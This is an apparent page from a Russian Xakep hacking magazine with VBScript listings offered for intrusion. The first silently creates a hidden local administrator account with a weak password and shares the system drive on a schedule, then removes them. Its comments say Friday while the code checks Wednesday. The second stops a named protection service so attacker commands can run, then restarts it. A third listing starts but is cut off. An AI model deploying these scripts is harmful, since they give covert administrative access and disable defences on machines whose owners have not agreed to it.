С петлей на шее

Анализирующий

Спецвыпуск Xakep, номер #040, стр. 040-084-4

На диск мы положили доки и примеры по этой теме, не забудь про них :).

Для хакера открывается парадный вход

ТИП: Листинг

<?xml version="1.0" encoding="windows-1251"?>

<job id="T1">

<script language="VBScript">

<![CDATA[

'Объявление используемых переменных и констант

Option Explicit

Const x=0

Dim WshShell, ResourceLifeTime

Dim UserName, UserPass, AdminsGroupName

Dim ShareName, Sharepath, ShareLifeTime

'Присвоение переменным нужных значений

UserName="RemoteUser"

UserPass="qwerty"

AdminsGroupName="Администраторы"

'В случае англоязычной системы следует указать "Administrators"

ShareName="RemoteShare$"

Sharepath="%SystemDrive%"

'Надеюсь про знаки доллара и процента говорить ничего не надо ;)

ResourceLifeTime=3600

'Время жизни созданных ресурсов в минутах

Set WshShell=WScript.CreateObject("WScript.Shell")

'Процедура, терпеливо ожидающая вечера пятницы

Sub Main()

Do While x=0

If DatePart("w",now())=vbWednesday And DatePart("h",now())>=17 Then

Call GetAll()

WScript.Sleep ResourceLifeTime*1000

Call UnGetAll()

Else

WScript.Sleep 600000

End If

Loop

End Sub

'Процедура создания шары и юзера

Sub GetAll()

WshShell.Run "NET USER " & UserName & " " & UserPass & " /ADD ",0

WScript.Sleep 2000

WshShell.Run "NET LOCALGROUP " & AdminsGroupName & " " & UserName & " /ADD",0

WshShell.Run "NET SHARE " & ShareName & "=" & Sharepath & " /USERS:1",0

End Sub

'Процедура удаления шары и юзера

Sub UnGetAll()

WshShell.Run "NET USER " & UserName & " /DELETE",0

WshShell.Run "NET SHARE " & ShareName & " /DELETE",0

End Sub

'Запуск всего этого

Call Main()

]]>

</script>

</job>

Запуск и остановка службы сценарием

ТИП: Листинг

<?xml version="1.0" encoding="windows-1251"?>

<job id="T1">

<script language="VBScript">

<![CDATA[

'Для начала объявляются все переменные

Option Explicit

Dim Computer, Computername

Dim Service, TargetService, LanManService

Dim WshNetwork, WshShell

'В этой переменной укажи имя мешающей тебе службы

Targetservice="spidernt"

'Определение имени компьютера

'Это делает сценарий универсальным

Set WshNetwork = Wscript.CreateObject("Wscript.Network")

ComputerName=WshNetwork.ComputerName

'Запускается служба "Рабочая станция"

'Если она запущена - ничего не произойдет

Set WshShell=WScript.CreateObject("WScript.Shell")

LanManService="NET START " & chr(34) & "lanmanworkstation" & chr(34)

WshShell.Run LanManService,0

'Время, необходимое для запуска службы

WScript.Sleep 10000

'Производится получение к службе локального компьютера

Set Computer=GetObject("WinNT://" & ComputerName & ",computer")

Set Service=Computer.GetObject("service",TargetService)

'Остановка службы

Service.Stop

'или пауза

'Service.Pause

'Время, необходимое для остановки

WScript.Sleep 5000

'***************************************

' Здесь располагаются инструкции взломщика

'****************************************

Запуск службы

Service.Start

'Или возобновление

'Service.Continue

WScript.Quit

]]>

</script>

</job>

Сценарий прячет ссылку на Блокнот от Regedit

ТИП: Листинг

<?xml version="1.0" encoding="windows-1251"?>